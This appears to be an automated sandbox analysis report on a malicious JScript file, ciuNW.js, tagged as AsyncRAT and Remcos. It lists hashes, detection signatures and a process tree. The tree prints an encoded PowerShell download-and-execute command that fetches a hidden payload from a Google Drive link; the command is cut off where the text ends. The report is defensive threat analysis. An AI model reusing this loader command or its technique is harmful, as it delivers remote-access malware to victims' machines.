Edit tour
Windows
Analysis Report
ciuNW.js
Overview
General Information
| Sample name: | ciuNW.js |
| Analysis ID: | 1546595 |
| MD5: | a43e44e9f6ad3bca330e780537a592a5 |
| SHA1: | 0e684129f92c43e33ab258dda8da023bbb9054a1 |
| SHA256: | 04363d3c6d6f3badf15f8e99d3739612a7eec439cdcb4457150bbb330a829e7a |
| Tags: | asyncratjsRemcosRATuser-NDA0E |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell Download and Execute IEX
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
JavaScript source code contains functionality to generate code involving a shell, file or stream
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7412 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\ciuNW .js" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 7468 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' SQBFAFgAKA AgACgAKAAn AFQAMgBIAG kAbQBhAGcA ZQBVAHIAbA AgAD0AIABa ADQAUwBoAH QAdABwAHMA OgAvAC8AZA ByAGkAdgBl AC4AZwBvAG 8AZwBsAGUA LgBjAG8AbQ AvAHUAYwA/ AGUAeABwAG 8AcgB0AD0A ZABvAHcAbg BsAG8AYQBk ACYAaQBkAD 0AMQBBAEkA VgBnAEoASg BKAHYAMQBG ADYAdgBTAD QAcwBVAE8A eQBiAG4ASA AtAHMARAB2 AFUAJwArAC cAaABCAFkA dwB1AHIAIA BaADQAUwA7 AFQAMgBIAH cAZQBiAEMA bABpAGUAbg B0ACAAPQAg ACcAKwAnAE 4AZQB3AC0A TwBiAGoAZQ BjAHQAIABT AHkAcwB0AG UAbQAuAE4A ZQB0AC4AVw BlAGIAQwBs AGkAZQAnAC sAJwBuAHQA OwBUADIASA BpAG0AYQBn AGUAQgB5AH QAZQBzACAA PQAgAFQAMg AnACsAJwBI AHcAZQBiAE MAbABpAGUA bgB0AC4ARA BvAHcAbgBs AG8AYQBkAE QAYQB0AGEA KABUADIASA BpAG0AYQBn AGUAVQByAG wAKQA7AFQA MgBIAGkAbQ BhACcAKwAn AGcAZQBUAG UAeAAnACsA JwB0ACAAPQ AgAFsAUwB5 AHMAdABlAG 0ALgBUAGUA eAB0AC4ARQ BuAGMAbwBk AGkAbgBnAF 0AOgA6AFUA VABGADgALg BHAGUAdABT AHQAJwArAC cAcgBpAG4A ZwAoAFQAMg BIAGkAbQBh AGcAZQBCAH kAdABlAHMA KQA7AFQAMg BIAHMAdABh AHIAdABGAG wAYQBnACAA PQAgAFoANA BTADwAPABC AEEAUwBFAD YANABfAFMA JwArACcAVA BBAFIAVAA+ AD4AWgA0AF MAOwAnACsA JwBUADIASA BlAG4AZABG AGwAYQBnAC AAPQAgAFoA NABTADwAPA BCAEEAUwBF ADYANABfAE UATgBEAD4A PgBaACcAKw AnADQAJwAr ACcAUwA7AF QAMgBIAHMA dABhAHIAdA BJAG4AZABl AHgAIAA9AC AAVAAyAEgA aQBtAGEAZw BlAFQAZQB4 AHQALgBJAG 4AZABlAHgA TwBmACgAVA AyAEgAcwB0 AGEAcgB0AE YAbABhAGcA KQA7AFQAMg BIAGUAbgBk AEkAbgBkAC cAKwAnAGUA eAAgAD0AIA BUADIASABp AG0AYQBnAG UAVABlAHgA dAAuAEkAbg BkACcAKwAn AGUAeABPAG YAKABUADIA SABlAG4AZA BGAGwAYQBn ACkAOwBUAD IASABzAHQA YQByAHQASQ BuAGQAZQB4 ACAALQAnAC sAJwBnAGUA IAAwACAALQ BhAG4AZAAg AFQAMgBIAG UAbgBkAEkA bgBkAGUAeA AgAC0AZwB0 ACAAVAAyAE gAcwB0AGEA cgB0AEkAbg BkACcAKwAn AGUAeAA7AF QAMgBIAHMA dABhAHIAdA BJAG4AZABl AHgAIAArAD 0AIAAnACsA JwBUADIASA BzAHQAYQBy AHQARgBsAG EAZwAuAEwA ZQBuAGcAdA BoADsAVAAy AEgAYgBhAH MAZQA2ADQA TABlAG4AZw B0AGgAIAA9 ACcAKwAnAC AAVAAyAEgA ZQBuAGQASQ BuAGQAZQB4 ACAALQAgAF QAMgBIAHMA dABhAHIAdA BJAG4AZABl AHgAOwBUAD IASABiAGEA cwAnACsAJw BlADYANABD AG8AbQBtAG EAbgBkACAA PQAgAFQAMg BIAGkAbQBh AGcAZQBUAG UAeAB0AC4A UwB1AGIAcw B0AHIAaQBu AGcAKABUAD IASABzAHQA YQByAHQASQ BuAGQAZQB4 ACwAIABUAD IASABiAGEA cwBlADYANA BMAGUAbgBn AHQAaAApAD sAVAAyAEgA YgBhAHMAZQ A2ADQAUgBl AHYAZQByAH MAZQBkACAA PQAgAC0Aag BvAGkAbgAg ACgAVAAyAE gAYgBhAHMA ZQA2ADQAQw BvAG0AbQBh AG4AZAAuAC cAKwAnAFQA bwBDAGgAYQ ByAEEAcgBy AGEAeQAoAC kAIABWAEcA cQAgAEYAbw AnACsAJwBy AEUAYQBjAG gALQBPAGIA agBlAGMAdA AgAHsAIABU ADIASABfAC AAfQApAFsA LQAnACsAJw AxACcAKwAn AC4ALgAtAC gAVAAyAEgA YgBhAHMAZQ A2ADQAQwBv AG0AbQBhAG 4AZAAuAEwA ZQBuAGcAdA BoACkAXQA7 AFQAMgBIAG MAbwBtAG0A YQBuAGQAQg B5AHQAZQBz ACAAPQAgAF sAUwB5AHMA dABlAG0AJw ArACcALgBD AG8AbgB2AG UAcgB0AF0A OgA6AEYAcg BvAG0AQgBh